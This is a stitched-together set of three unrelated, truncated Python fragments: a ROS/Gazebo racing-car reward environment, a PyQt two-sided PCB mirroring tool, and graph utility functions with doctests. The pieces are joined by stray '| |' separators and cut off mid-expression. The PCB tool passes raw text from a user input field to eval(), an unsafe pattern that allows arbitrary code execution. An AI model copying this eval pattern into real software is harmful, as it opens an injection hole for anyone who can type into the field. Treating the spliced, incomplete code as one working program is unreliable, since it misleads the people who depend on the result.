def send_action(self, steering_angle, speed):
ack_msg = AckermannDriveStamped()
ack_msg.header.stamp = rospy.Time.now()
ack_msg.drive.steering_angle = steering_angle
ack_msg.drive.speed = speed
self.ack_publisher.publish(ack_msg)
def infer_reward_state(self, steering_angle, speed):
rospy.wait_for_service('/gazebo/get_model_state')
rospy.wait_for_service('/gazebo/get_link_state')
# Wait till we have a image from the camera
# btown TODO: Incorporate feedback from callejae@ here (CR-6434645 rev1)
while not self.image:
time.sleep(SLEEP_WAITING_FOR_IMAGE_TIME_IN_SECOND)
# Read model state from Gazebo
model_state = self.get_model_state('racecar', '')
model_orientation = Rotation.from_quat([
model_state.pose.orientation.x,
model_state.pose.orientation.y,
model_state.pose.orientation.z,
model_state.pose.orientation.w])
model_location = np.array([
model_state.pose.position.x,
model_state.pose.position.y,
model_state.pose.position.z]) + \
model_orientation.apply(RELATIVE_POSITION_OF_FRONT_OF_CAR)
model_point = Point(model_location[0], model_location[1])
model_heading = model_orientation.as_euler('zyx')[0]
# Read the wheel locations from Gazebo
left_rear_wheel_state = self.get_link_state('racecar::left_rear_wheel', '')
left_front_wheel_state = self.get_link_state('racecar::left_front_wheel', '')
right_rear_wheel_state = self.get_link_state('racecar::right_rear_wheel', '')
right_front_wheel_state = self.get_link_state('racecar::right_front_wheel', '')
wheel_points = [
Point(left_rear_wheel_state.link_state.pose.position.x,
left_rear_wheel_state.link_state.pose.position.y),
Point(left_front_wheel_state.link_state.pose.position.x,
left_front_wheel_state.link_state.pose.position.y),
Point(right_rear_wheel_state.link_state.pose.position.x,
right_rear_wheel_state.link_state.pose.position.y),
Point(right_front_wheel_state.link_state.pose.position.x,
right_front_wheel_state.link_state.pose.position.y)
]
# Project the current location onto the center line and find nearest points
current_dist = self.center_line.project(model_point, normalized=True)
next_waypoint_index = max(0, min(bisect.bisect(self.center_dists, current_dist), len(self.center_dists) - 1))
prev_waypoint_index = next_waypoint_index - 1
distance_from_next = model_point.distance(Point(self.center_line.coords[next_waypoint_index]))
distance_from_prev = model_point.distance(Point(self.center_line.coords[prev_waypoint_index]))
closest_waypoint_index = (prev_waypoint_index, next_waypoint_index)[distance_from_next < distance_from_prev]
# Compute distance from center and road width
nearest_point_center = self.center_line.interpolate(current_dist, normalized=True)
nearest_point_inner = self.inner_border.interpolate(self.inner_border.project(nearest_point_center))
nearest_point_outer = self.outer_border.interpolate(self.outer_border.project(nearest_point_center))
distance_from_center = nearest_point_center.distance(model_point)
distance_from_inner = nearest_point_inner.distance(model_point)
distance_from_outer = nearest_point_outer.distance(model_point)
track_width = nearest_point_inner.distance(nearest_point_outer)
is_left_of_center = (distance_from_outer < distance_from_inner) if self.reverse_dir \
else (distance_from_inner < distance_from_outer)
# Convert current progress to be [0,100] starting at the initial waypoint
current_progress = current_dist - self.start_dist
if current_progress < 0.0: current_progress = current_progress + 1.0
current_progress = 100 * current_progress
if current_progress < self.prev_progress:
# Either: (1) we wrapped around and have finished the track,
delta1 = current_progress + 100 - self.prev_progress
# or (2) for some reason the car went backwards (this should be rare)
delta2 = self.prev_progress - current_progress
current_progress = (self.prev_progress, 100)[delta1 < delta2]
# Car is off track if all wheels are outside the borders
wheel_on_track = [self.road_poly.contains(p) for p in wheel_points]
all_wheels_on_track = all(wheel_on_track)
any_wheels_on_track = any(wheel_on_track)
# Compute the reward
if any_wheels_on_track:
done = False
params = {
'all_wheels_on_track': all_wheels_on_track,
'x': model_point.x,
'y': model_point.y,
'heading': model_heading * 180.0 / math.pi,
'distance_from_center': distance_from_center,
'progress': current_progress,
'steps': self.steps,
'speed': speed,
'steering_angle': steering_angle * 180.0 / math.pi,
'track_width': track_width,
'waypoints': list(self.center_line.coords),
'closest_waypoints': [prev_waypoint_index, next_waypoint_index],
'is_left_of_center': is_left_of_center,
'is_reversed': self.reverse_dir
}
reward = self.reward_function(params)
else:
done = True
reward = CRASHED
# Reset if the car position hasn't changed in the last 2 steps
if min(model_point.distance(self.prev_point), model_point.distance(self.prev_point_2)) <= 0.0001:
done = True
reward = CRASHED # stuck
# Simulation jobs are done when progress reaches 100
if current_progress >= 100:
done = True
# Keep data from the previous step around
self.prev_point_2 = self.prev_point
self.prev_point = model_point
self.prev_progress = current_progress
# Read the image and resize to get the state
image = Image.frombytes('RGB', (self.image.width, self.image.height), self.image.data, 'raw', 'RGB', 0, 1)
image = image.resize(TRAINING_IMAGE_SIZE, resample=2)
state = np.array(image)
# Set the next state, reward, and done flag
self.next_state = state
self.reward = reward
self.reward_in_episode += reward
self.done = done
# Trace logs to help us debug and visualize the training runs
# btown TODO: This should be written to S3, not to CWL.
stdout_ = 'SIM_TRACE_LOG:%d,%d,%.4f,%.4f,%.4f,%.2f,%.2f,%d,%.4f,%s,%s,%.4f,%d,%.2f,%s\n' % (
self.episodes, self.steps, model_location[0], model_location[1], model_heading,
self.steering_angle,
self.speed,
self.action_taken,
self.reward,
self.done,
all_wheels_on_track,
current_progress,
closest_waypoint_index,
self.track_length,
time.time())
print(stdout_)
# Terminate this episode when ready
if self.done and node_type == SIMULATION_WORKER:
self.finish_episode(current_progress)
def finish_episode(self, progress):
# Stop the car from moving
self.send_action(0, 0)
# Increment episode count, update start dist for round robin
self.episodes += 1
if self.round_robin:
self.start_dist = (self.start_dist + ROUND_ROBIN_ADVANCE_DIST) % 1.0
# Update metrics based on job type
if self.job_type == TRAINING_JOB:
self.send_reward_to_cloudwatch(self.reward_in_episode)
self.update_training_metrics()
self.write_metrics_to_s3()
if self.is_training_done():
self.cancel_simulation_job()
elif self.job_type == EVALUATION_JOB:
self.number_of_trials += 1
self.update_eval_metrics(progress)
self.write_metrics_to_s3()
if self.is_evaluation_done():
self.cancel_simulation_job()
def update_eval_metrics(self, progress):
eval_metric = {}
eval_metric['completion_percentage'] = int(progress)
eval_metric['metric_time'] = int(round(time.time() * | |
from PyQt5 import QtWidgets, QtCore, QtGui
from appTool import AppTool
from appGUI.GUIElements import RadioSet, FCDoubleSpinner, FCButton, FCComboBox, NumericalEvalTupleEntry, FCLabel
from numpy import Inf
from shapely.geometry import Point
from shapely import affinity
import logging
import gettext
import appTranslation as fcTranslate
import builtins
fcTranslate.apply_language('strings')
if '_' not in builtins.__dict__:
_ = gettext.gettext
log = logging.getLogger('base')
class DblSidedTool(AppTool):
def __init__(self, app):
AppTool.__init__(self, app)
self.decimals = self.app.decimals
self.canvas = self.app.plotcanvas
# #############################################################################
# ######################### Tool GUI ##########################################
# #############################################################################
self.ui = DsidedUI(layout=self.layout, app=self.app)
self.toolName = self.ui.toolName
self.mr = None
# ## Signals
self.ui.object_type_radio.activated_custom.connect(self.on_object_type)
self.ui.add_point_button.clicked.connect(self.on_point_add)
self.ui.add_drill_point_button.clicked.connect(self.on_drill_add)
self.ui.delete_drill_point_button.clicked.connect(self.on_drill_delete_last)
self.ui.box_type_radio.activated_custom.connect(self.on_combo_box_type)
self.ui.axis_location.group_toggle_fn = self.on_toggle_pointbox
self.ui.point_entry.textChanged.connect(lambda val: self.ui.align_ref_label_val.set_value(val))
self.ui.pick_hole_button.clicked.connect(self.on_pick_hole)
self.ui.mirror_button.clicked.connect(self.on_mirror)
self.ui.xmin_btn.clicked.connect(self.on_xmin_clicked)
self.ui.ymin_btn.clicked.connect(self.on_ymin_clicked)
self.ui.xmax_btn.clicked.connect(self.on_xmax_clicked)
self.ui.ymax_btn.clicked.connect(self.on_ymax_clicked)
self.ui.center_btn.clicked.connect(
lambda: self.ui.point_entry.set_value(self.ui.center_entry.get_value())
)
self.ui.create_alignment_hole_button.clicked.connect(self.on_create_alignment_holes)
self.ui.calculate_bb_button.clicked.connect(self.on_bbox_coordinates)
self.ui.reset_button.clicked.connect(self.set_tool_ui)
self.drill_values = ""
# will hold the Excellon object used for picking a hole as mirror reference
self.exc_hole_obj = None
# store the status of the grid
self.grid_status_memory = None
# set True if mouse events are locally connected
self.local_connected = False
def install(self, icon=None, separator=None, **kwargs):
AppTool.install(self, icon, separator, shortcut='Alt+D', **kwargs)
def run(self, toggle=True):
self.app.defaults.report_usage("Tool2Sided()")
if toggle:
# if the splitter is hidden, display it, else hide it but only if the current widget is the same
if self.app.ui.splitter.sizes()[0] == 0:
self.app.ui.splitter.setSizes([1, 1])
else:
try:
if self.app.ui.tool_scroll_area.widget().objectName() == self.toolName:
# if tab is populated with the tool but it does not have the focus, focus on it
if not self.app.ui.notebook.currentWidget() is self.app.ui.tool_tab:
# focus on Tool Tab
self.app.ui.notebook.setCurrentWidget(self.app.ui.tool_tab)
else:
self.app.ui.splitter.setSizes([0, 1])
except AttributeError:
pass
else:
if self.app.ui.splitter.sizes()[0] == 0:
self.app.ui.splitter.setSizes([1, 1])
AppTool.run(self)
self.set_tool_ui()
self.app.ui.notebook.setTabText(2, _("2-Sided Tool"))
def set_tool_ui(self):
self.reset_fields()
self.ui.point_entry.set_value("")
self.ui.alignment_holes.set_value("")
self.ui.mirror_axis.set_value(self.app.defaults["tools_2sided_mirror_axis"])
self.ui.axis_location.set_value(self.app.defaults["tools_2sided_axis_loc"])
self.ui.drill_dia.set_value(self.app.defaults["tools_2sided_drilldia"])
self.ui.align_axis_radio.set_value(self.app.defaults["tools_2sided_allign_axis"])
self.ui.xmin_entry.set_value(0.0)
self.ui.ymin_entry.set_value(0.0)
self.ui.xmax_entry.set_value(0.0)
self.ui.ymax_entry.set_value(0.0)
self.ui.center_entry.set_value('')
self.ui.align_ref_label_val.set_value('%.*f' % (self.decimals, 0.0))
# run once to make sure that the obj_type attribute is updated in the FCComboBox
self.ui.object_type_radio.set_value('grb')
self.on_object_type('grb')
self.ui.box_type_radio.set_value('grb')
self.on_combo_box_type('grb')
if self.local_connected is True:
self.disconnect_events()
def on_object_type(self, val):
obj_type = {'grb': 0, 'exc': 1, 'geo': 2}[val]
self.ui.object_combo.setRootModelIndex(self.app.collection.index(obj_type, 0, QtCore.QModelIndex()))
self.ui.object_combo.setCurrentIndex(0)
self.ui.object_combo.obj_type = {
"grb": "Gerber", "exc": "Excellon", "geo": "Geometry"}[val]
def on_combo_box_type(self, val):
obj_type = {'grb': 0, 'exc': 1, 'geo': 2}[val]
self.ui.box_combo.setRootModelIndex(self.app.collection.index(obj_type, 0, QtCore.QModelIndex()))
self.ui.box_combo.setCurrentIndex(0)
self.ui.box_combo.obj_type = {
"grb": "Gerber", "exc": "Excellon", "geo": "Geometry"}[val]
def on_create_alignment_holes(self):
axis = self.ui.align_axis_radio.get_value()
mode = self.ui.axis_location.get_value()
if mode == "point":
try:
px, py = self.ui.point_entry.get_value()
except TypeError:
msg = '[WARNING_NOTCL] %s' % \
_("'Point' reference is selected and 'Point' coordinates are missing. Add them and retry.")
self.app.inform.emit(msg)
return
else:
selection_index = self.ui.box_combo.currentIndex()
model_index = self.app.collection.index(selection_index, 0, self.ui.object_combo.rootModelIndex())
try:
bb_obj = model_index.internalPointer().obj
except AttributeError:
msg = '[WARNING_NOTCL] %s' % _("There is no Box reference object loaded. Load one and retry.")
self.app.inform.emit(msg)
return
xmin, ymin, xmax, ymax = bb_obj.bounds()
px = 0.5 * (xmin + xmax)
py = 0.5 * (ymin + ymax)
xscale, yscale = {"X": (1.0, -1.0), "Y": (-1.0, 1.0)}[axis]
dia = self.ui.drill_dia.get_value()
if dia == '':
msg = '[WARNING_NOTCL] %s' % _("No value or wrong format in Drill Dia entry. Add it and retry.")
self.app.inform.emit(msg)
return
tools = {1: {}}
tools[1]["tooldia"] = dia
tools[1]['drills'] = []
tools[1]['solid_geometry'] = []
# holes = self.alignment_holes.get_value()
holes = eval('[{}]'.format(self.ui.alignment_holes.text()))
if not holes:
msg = '[WARNING_NOTCL] %s' % _("There are no Alignment Drill Coordinates to use. Add them and retry.")
self.app.inform.emit(msg)
return
for hole in holes:
point = Point(hole)
point_mirror = affinity.scale(point, xscale, yscale, origin=(px, py))
tools[1]['drills'] += [point, point_mirror]
tools[1]['solid_geometry'] += [point, point_mirror]
def obj_init(obj_inst, app_inst):
obj_inst.tools = tools
obj_inst.create_geometry()
obj_inst.source_file = app_inst.f_handlers.export_excellon(obj_name=obj_inst.options['name'],
local_use=obj_inst,
filename=None,
use_thread=False)
ret_val = self.app.app_obj.new_object("excellon", _("Alignment Drills"), obj_init)
self.drill_values = ''
if not ret_val == 'fail':
self.app.inform.emit('[success] %s' % _("Excellon object with alignment drills created..."))
def on_pick_hole(self):
# get the Excellon file whose geometry will contain the desired drill hole
selection_index = self.ui.exc_combo.currentIndex()
model_index = self.app.collection.index(selection_index, 0, self.ui.exc_combo.rootModelIndex())
try:
self.exc_hole_obj = model_index.internalPointer().obj
except Exception:
self.app.inform.emit('[WARNING_NOTCL] %s' % _("There is no Excellon object loaded ..."))
return
# disengage the grid snapping since it will be hard to find the drills or pads on grid
if self.app.ui.grid_snap_btn.isChecked():
self.grid_status_memory = True
self.app.ui.grid_snap_btn.trigger()
else:
self.grid_status_memory = False
self.local_connected = True
self.app.inform.emit('%s.' % _("Click on canvas within the desired Excellon drill hole"))
self.mr = self.canvas.graph_event_connect('mouse_release', self.on_mouse_click_release)
if self.app.is_legacy is False:
self.canvas.graph_event_disconnect('mouse_release', self.app.on_mouse_click_release_over_plot)
else:
self.canvas.graph_event_disconnect(self.app.mr)
def on_mouse_click_release(self, event):
if self.app.is_legacy is False:
event_pos = event.pos
right_button = 2
self.app.event_is_dragging = self.app.event_is_dragging
else:
event_pos = (event.xdata, event.ydata)
right_button = 3
self.app.event_is_dragging = self.app.ui.popMenu.mouse_is_panning
pos_canvas = self.canvas.translate_coords(event_pos)
if event.button == 1:
click_pt = Point([pos_canvas[0], pos_canvas[1]])
if self.app.selection_type is not None:
# delete previous selection shape
self.app.delete_selection_shape()
self.app.selection_type = None
else:
if self.exc_hole_obj.kind.lower() == 'excellon':
for tool, tool_dict in self.exc_hole_obj.tools.items():
for geo in tool_dict['solid_geometry']:
if click_pt.within(geo):
center_pt = geo.centroid
center_pt_coords = (
self.app.dec_format(center_pt.x, self.decimals),
self.app.dec_format(center_pt.y, self.decimals)
)
self.app.delete_selection_shape()
self.ui.axis_location.set_value('point')
# set the reference point for mirror
self.ui.point_entry.set_value(center_pt_coords)
self.app.inform.emit('[success] %s' % _("Mirror reference point set."))
elif event.button == right_button and self.app.event_is_dragging is False:
self.app.delete_selection_shape()
self.disconnect_events()
self.app.inform.emit('[WARNING_NOTCL] %s' % _("Cancelled by user request."))
def disconnect_events(self):
self.app.mr = self.canvas.graph_event_connect('mouse_release', self.app.on_mouse_click_release_over_plot)
if self.app.is_legacy is False:
self.canvas.graph_event_disconnect('mouse_release', self.on_mouse_click_release)
else:
self.canvas.graph_event_disconnect(self.mr)
self.local_connected = False
def on_mirror(self):
selection_index = self.ui.object_combo.currentIndex()
# fcobj = self.app.collection.object_list[selection_index]
model_index = self.app.collection.index(selection_index, 0, self.ui.object_combo.rootModelIndex())
try:
fcobj = model_index.internalPointer().obj
except Exception:
self.app.inform.emit('[WARNING_NOTCL] %s' % _("There is no Gerber object loaded ..."))
return
if fcobj.kind not in ['gerber', 'geometry', 'excellon']:
self.app.inform.emit('[ERROR_NOTCL] %s' % _("Only Gerber, Excellon and Geometry objects can be mirrored."))
return
axis = self.ui.mirror_axis.get_value()
mode = self.ui.axis_location.get_value()
if mode == "box":
selection_index_box = self.ui.box_combo.currentIndex()
model_index_box = self.app.collection.index(selection_index_box, 0, self.ui.box_combo.rootModelIndex())
try:
bb_obj = model_index_box.internalPointer().obj
except Exception:
self.app.inform.emit('[WARNING_NOTCL] %s' % _("There is no Box object loaded ..."))
return
xmin, ymin, xmax, ymax = bb_obj.bounds()
px = 0.5 * (xmin + xmax)
py = 0.5 * (ymin + ymax)
else:
try:
px, py = self.ui.point_entry.get_value()
except TypeError:
self.app.inform.emit('[WARNING_NOTCL] %s' % _("There are no Point coordinates in the Point field. "
"Add coords and try again ..."))
return
fcobj.mirror(axis, [px, py])
self.app.app_obj.object_changed.emit(fcobj)
fcobj.plot()
self.app.inform.emit('[success] %s: %s' % (_("Object was mirrored"), str(fcobj.options['name'])))
def on_point_add(self):
val = self.app.defaults["global_point_clipboard_format"] % \
(self.decimals, self.app.pos[0], self.decimals, self.app.pos[1])
self.ui.point_entry.set_value(val)
def on_drill_add(self):
self.drill_values += (self.app.defaults["global_point_clipboard_format"] %
(self.decimals, self.app.pos[0], self.decimals, self.app.pos[1])) + ','
self.ui.alignment_holes.set_value(self.drill_values)
def on_drill_delete_last(self):
drill_values_without_last_tupple = self.drill_values.rpartition('(')[0]
self.drill_values = drill_values_without_last_tupple
self.ui.alignment_holes.set_value(self.drill_values)
def on_toggle_pointbox(self):
val = self.ui.axis_location.get_value()
if val == "point":
self.ui.point_entry.show()
self.ui.add_point_button.show()
self.ui.box_type_label.hide()
self.ui.box_type_radio.hide()
self.ui.box_combo.hide()
self.ui.exc_hole_lbl.hide()
self.ui.exc_combo.hide()
self.ui.pick_hole_button.hide()
self.ui.align_ref_label_val.set_value(self.ui.point_entry.get_value())
elif val == 'box':
self.ui.point_entry.hide()
self.ui.add_point_button.hide()
self.ui.box_type_label.show()
self.ui.box_type_radio.show()
self.ui.box_combo.show()
self.ui.exc_hole_lbl.hide()
self.ui.exc_combo.hide()
self.ui.pick_hole_button.hide()
self.ui.align_ref_label_val.set_value("Box centroid")
elif val == 'hole':
self.ui.point_entry.show()
self.ui.add_point_button.hide()
self.ui.box_type_label.hide()
self.ui.box_type_radio.hide()
self.ui.box_combo.hide()
self.ui.exc_hole_lbl.show()
self.ui.exc_combo.show()
self.ui.pick_hole_button.show()
def on_bbox_coordinates(self):
xmin = Inf
ymin = Inf
xmax = -Inf
ymax = -Inf
obj_list = self.app.collection.get_selected()
if not obj_list:
self.app.inform.emit('[ERROR_NOTCL] %s %s' % (_("Failed."), _("No object is selected.")))
return
for obj in obj_list:
try:
gxmin, gymin, gxmax, gymax = obj.bounds()
xmin = min([xmin, gxmin])
ymin = min([ymin, gymin])
xmax = max([xmax, gxmax])
ymax = max([ymax, gymax])
except Exception as e:
log.warning("DEV WARNING: Tried to get bounds of empty geometry in DblSidedTool. %s" % str(e))
self.ui.xmin_entry.set_value(xmin)
self.ui.ymin_entry.set_value(ymin)
self.ui.xmax_entry.set_value(xmax)
self.ui.ymax_entry.set_value(ymax)
cx = '%.*f' % (self.decimals, (((xmax - xmin) / 2.0) + xmin))
cy = '%.*f' % (self.decimals, (((ymax - ymin) / 2.0) + ymin))
val_txt = '(%s, %s)' % (cx, cy)
self.ui.center_entry.set_value(val_txt)
self.ui.axis_location.set_value('point')
self.ui.point_entry.set_value(val_txt)
self.app.delete_selection_shape()
def on_xmin_clicked(self):
xmin = self.ui.xmin_entry.get_value()
self.ui.axis_location.set_value('point')
try:
px, py = self.ui.point_entry.get_value()
val = self.app.defaults["global_point_clipboard_format"] % (self.decimals, xmin, self.decimals, py)
except TypeError:
val = self.app.defaults["global_point_clipboard_format"] % (self.decimals, xmin, self.decimals, 0.0)
self.ui.point_entry.set_value(val)
def on_ymin_clicked(self):
ymin = self.ui.ymin_entry.get_value()
self.ui.axis_location.set_value('point')
try:
px, py = self.ui.point_entry.get_value()
val = self.app.defaults["global_point_clipboard_format"] % (self.decimals, px, self.decimals, ymin)
except TypeError:
val = self.app.defaults["global_point_clipboard_format"] % (self.decimals, 0.0, self.decimals, ymin)
self.ui.point_entry.set_value(val)
def on_xmax_clicked(self):
xmax = self.ui.xmax_entry.get_value()
self.ui.axis_location.set_value('point')
try:
px, py = self.ui.point_entry.get_value()
val = self.app.defaults["global_point_clipboard_format"] % (self.decimals, xmax, self.decimals, py)
except TypeError:
val = self.app.defaults["global_point_clipboard_format"] % (self.decimals, xmax, self.decimals, 0.0)
self.ui.point_entry.set_value(val)
def on_ymax_clicked(self):
ymax = self.ui.ymax_entry.get_value()
self.ui.axis_location.set_value('point')
try:
px, py = self.ui.point_entry.get_value()
val = self.app.defaults["global_point_clipboard_format"] % (self.decimals, px, self.decimals, ymax)
except TypeError:
val = self.app.defaults["global_point_clipboard_format"] % (self.decimals, 0.0, self.decimals, ymax)
self.ui.point_entry.set_value(val)
def reset_fields(self):
self.ui.object_combo.setRootModelIndex(self.app.collection.index(0, 0, QtCore.QModelIndex()))
self.ui.box_combo.setRootModelIndex(self.app.collection.index(0, 0, QtCore.QModelIndex()))
self.ui.object_combo.setCurrentIndex(0)
self.ui.box_combo.setCurrentIndex(0)
self.ui.box_type_radio.set_value('grb')
self.drill_values = ""
self.ui.align_ref_label_val.set_value('')
class DsidedUI:
toolName = _("2-Sided PCB")
def __init__(self, layout, app):
self.app = app
self.decimals = self.app.decimals
self.layout = layout
# ## Title
title_label = FCLabel("%s" % self.toolName)
title_label.setStyleSheet("""
| |
{
'fgweight': None,
},
},
}
"""
# Hacky but illustrative
# TODO; implement non-hacky version
allkeys = get_allkeys(dict_)
mat = np.zeros((len(allkeys), len(allkeys)))
for key in allkeys:
if key != root:
for parent in child_to_parents[key]:
rx = allkeys.index(parent)
cx = allkeys.index(key)
mat[rx][cx] = 1
end = None
seen_ = set([])
reversed_ = {root: traverse_path(root, end, seen_, allkeys, mat)}
return reversed_
def get_levels(dict_, n=0, levels=None):
r"""
DEPCIRATE
Args:
dict_ (dict_): a dictionary
n (int): (default = 0)
levels (None): (default = None)
CommandLine:
python -m utool.util_graph --test-get_levels --show
python3 -m utool.util_graph --test-get_levels --show
Example:
>>> # DISABLE_DOCTEST
>>> from utool.util_graph import * # NOQA
>>> import utool as ut
>>> from_root = {
>>> 'dummy_annot': {
>>> 'chip': {
>>> 'keypoint': {
>>> 'fgweight': None,
>>> },
>>> },
>>> 'probchip': {
>>> 'fgweight': None,
>>> },
>>> },
>>> }
>>> dict_ = from_root
>>> n = 0
>>> levels = None
>>> levels_ = get_levels(dict_, n, levels)
>>> result = ut.repr2(levels_, nl=1)
>>> print(result)
[
['dummy_annot'],
['chip', 'probchip'],
['keypoint', 'fgweight'],
['fgweight'],
]
"""
if levels is None:
levels_ = [[] for _ in range(dict_depth(dict_))]
else:
levels_ = levels
if dict_ is None:
return []
for key in dict_.keys():
levels_[n].append(key)
for val in dict_.values():
get_levels(val, n + 1, levels_)
return levels_
def longest_levels(levels_):
r"""
Args:
levels_ (list):
CommandLine:
python -m utool.util_graph --exec-longest_levels --show
Example:
>>> # ENABLE_DOCTEST
>>> from utool.util_graph import * # NOQA
>>> import utool as ut
>>> levels_ = [
>>> ['dummy_annot'],
>>> ['chip', 'probchip'],
>>> ['keypoint', 'fgweight'],
>>> ['fgweight'],
>>> ]
>>> new_levels = longest_levels(levels_)
>>> result = ('new_levels = %s' % (ut.repr2(new_levels, nl=1),))
>>> print(result)
new_levels = [
['dummy_annot'],
['chip', 'probchip'],
['keypoint'],
['fgweight'],
]
"""
return shortest_levels(levels_[::-1])[::-1]
# seen_ = set([])
# new_levels = []
# for level in levels_[::-1]:
# new_level = [item for item in level if item not in seen_]
# seen_ = seen_.union(set(new_level))
# new_levels.append(new_level)
# new_levels = new_levels[::-1]
# return new_levels
def shortest_levels(levels_):
r"""
Args:
levels_ (list):
CommandLine:
python -m utool.util_graph --exec-shortest_levels --show
Example:
>>> # ENABLE_DOCTEST
>>> from utool.util_graph import * # NOQA
>>> import utool as ut
>>> levels_ = [
>>> ['dummy_annot'],
>>> ['chip', 'probchip'],
>>> ['keypoint', 'fgweight'],
>>> ['fgweight'],
>>> ]
>>> new_levels = shortest_levels(levels_)
>>> result = ('new_levels = %s' % (ut.repr2(new_levels, nl=1),))
>>> print(result)
new_levels = [
['dummy_annot'],
['chip', 'probchip'],
['keypoint', 'fgweight'],
]
"""
seen_ = set([])
new_levels = []
for level in levels_:
new_level = [item for item in level if item not in seen_]
seen_ = seen_.union(set(new_level))
if len(new_level) > 0:
new_levels.append(new_level)
new_levels = new_levels
return new_levels
def simplify_graph(graph):
"""
strips out everything but connectivity
Args:
graph (nx.Graph):
Returns:
nx.Graph: new_graph
CommandLine:
python3 -m utool.util_graph simplify_graph --show
python2 -m utool.util_graph simplify_graph --show
python2 -c "import networkx as nx; print(nx.__version__)"
python3 -c "import networkx as nx; print(nx.__version__)"
Ignore:
>>> # ENABLE_DOCTEST
>>> from utool.util_graph import * # NOQA
>>> import utool as ut
>>> graph = nx.DiGraph([('a', 'b'), ('a', 'c'), ('a', 'e'),
>>> ('a', 'd'), ('b', 'd'), ('c', 'e'),
>>> ('d', 'e'), ('c', 'e'), ('c', 'd')])
>>> new_graph = simplify_graph(graph)
>>> result = ut.repr2(list(new_graph.edges()))
>>> #adj_list = sorted(list(nx.generate_adjlist(new_graph)))
>>> #result = ut.repr2(adj_list)
>>> print(result)
[(0, 1), (0, 2), (0, 3), (0, 4), (1, 3), (2, 3), (2, 4), (3, 4)]
['0 1 2 3 4', '1 3 4', '2 4', '3', '4 3']
"""
import utool as ut
nodes = sorted(list(graph.nodes()))
node_lookup = ut.make_index_lookup(nodes)
if graph.is_multigraph():
edges = list(graph.edges(keys=True))
else:
edges = list(graph.edges())
new_nodes = ut.take(node_lookup, nodes)
if graph.is_multigraph():
new_edges = [(node_lookup[e[0]], node_lookup[e[1]], e[2], {}) for e in edges]
else:
new_edges = [(node_lookup[e[0]], node_lookup[e[1]]) for e in edges]
cls = graph.__class__
new_graph = cls()
new_graph.add_nodes_from(new_nodes)
new_graph.add_edges_from(new_edges)
return new_graph
def subgraph_from_edges(G, edge_list, ref_back=True):
"""
Creates a networkx graph that is a subgraph of G
defined by the list of edges in edge_list.
Requires G to be a networkx MultiGraph or MultiDiGraph
edge_list is a list of edges in either (u,v) or (u,v,d) form
where u and v are nodes comprising an edge,
and d would be a dictionary of edge attributes
ref_back determines whether the created subgraph refers to back
to the original graph and therefore changes to the subgraph's
attributes also affect the original graph, or if it is to create a
new copy of the original graph.
References:
http://stackoverflow.com/questions/16150557/nx-subgraph-from-edges
"""
# TODO: support multi-di-graph
sub_nodes = list({y for x in edge_list for y in x[0:2]})
#edge_list_no_data = [edge[0:2] for edge in edge_list]
multi_edge_list = [edge[0:3] for edge in edge_list]
if ref_back:
G_sub = G.subgraph(sub_nodes)
for edge in G_sub.edges(keys=True):
if edge not in multi_edge_list:
G_sub.remove_edge(*edge)
else:
G_sub = G.subgraph(sub_nodes).copy()
for edge in G_sub.edges(keys=True):
if edge not in multi_edge_list:
G_sub.remove_edge(*edge)
return G_sub
def nx_node_dict(G):
if nx.__version__.startswith('1'):
return getattr(G, 'node')
else:
return G.nodes
def all_multi_paths(graph, source, target, data=False):
r"""
Returns specific paths along multi-edges from the source to this table.
Multipaths are identified by edge keys.
Returns all paths from source to target. This function treats multi-edges
as distinct and returns the key value in each edge tuple that defines a
path.
Example:
>>> # DISABLE_DOCTEST
>>> from dtool.depcache_control import * # NOQA
>>> from utool.util_graph import * # NOQA
>>> from dtool.example_depcache import testdata_depc
>>> depc = testdata_depc()
>>> graph = depc.graph
>>> source = depc.root
>>> target = 'notchpair'
>>> path_list1 = ut.all_multi_paths(graph, depc.root, 'notchpair')
>>> path_list2 = ut.all_multi_paths(graph, depc.root, 'spam')
>>> result1 = ('path_list1 = %s' % ut.repr3(path_list1, nl=1))
>>> result2 = ('path_list2 = %s' % ut.repr3(path_list2, nl=2))
>>> result = '\n'.join([result1, result2])
>>> print(result)
path_list1 = [
[('dummy_annot', 'notch', 0), ('notch', 'notchpair', 0)],
[('dummy_annot', 'notch', 0), ('notch', 'notchpair', 1)],
]
path_list2 = [
[
('dummy_annot', 'chip', 0),
('chip', 'keypoint', 0),
('keypoint', 'fgweight', 0),
('fgweight', 'spam', 0),
],
[
('dummy_annot', 'chip', 0),
('chip', 'keypoint', 0),
('keypoint', 'spam', 0),
],
[
('dummy_annot', 'chip', 0),
('chip', 'spam', 0),
],
[
('dummy_annot', 'probchip', 0),
('probchip', 'fgweight', 0),
('fgweight', 'spam', 0),
],
]
"""
path_multiedges = list(nx_all_simple_edge_paths(graph, source, target,
keys=True, data=data))
return path_multiedges
def reverse_path_edges(edge_list):
return [(edge[1], edge[0],) + tuple(edge[2:]) for edge in edge_list][::-1]
def bfs_multi_edges(G, source, reverse=False, keys=True, data=False):
"""Produce edges in a breadth-first-search starting at source.
-----
Based on http://www.ics.uci.edu/~eppstein/PADS/BFS.py
by <NAME>, July 2004.
"""
from collections import deque
from functools import partial
if reverse:
G = G.reverse()
edges_iter = partial(G.edges_iter, keys=keys, data=data)
list(G.edges_iter('multitest', keys=True, data=True))
visited_nodes = set([source])
# visited_edges = set([])
queue = deque([(source, edges_iter(source))])
while queue:
parent, edges = queue[0]
try:
edge = next(edges)
edge_nodata = edge[0:3]
# if edge_nodata not in visited_edges:
yield edge
# visited_edges.add(edge_nodata)
child = edge_nodata[1]
if child not in visited_nodes:
visited_nodes.add(child)
queue.append((child, edges_iter(child)))
except StopIteration:
queue.popleft()
def dfs_conditional(G, source, state, can_cross):
"""
Example:
>>> # ENABLE_DOCTEST
>>> from utool.util_graph import *
>>> G = nx.Graph()
>>> G.add_edges_from([(1, 2), (2, 3), (3, 4), (4, 5)])
>>> G.adj[2][3]['lava'] = True
>>> G.adj[3][4]['lava'] = True
>>> def can_cross(G, edge, state):
>>> # can only cross lava once, then your lava protection wears off
>>> data = G.get_edge_data(*edge)
>>> lava = int(data.get('lava', False))
>>> if not lava or state == 0:
>>> return True, state + lava
>>> return False, lava
>>> assert 5 not in dfs_conditional(G, 1, state=0, can_cross=can_cross)
>>> G.adj[3][4]['lava'] = False
>>> assert 5 in dfs_conditional(G, 1, state=0, can_cross=can_cross)
"""
# stack based version
visited = {source}
stack = [(source, iter(G[source]), state)]
while stack:
parent, children, state = stack[-1]
try:
child = next(children)
if child not in visited:
edge = (parent, child)
flag, new_state = can_cross(G, edge, state)
if flag:
yield child
visited.add(child)
stack.append((child, iter(G[child]), new_state))
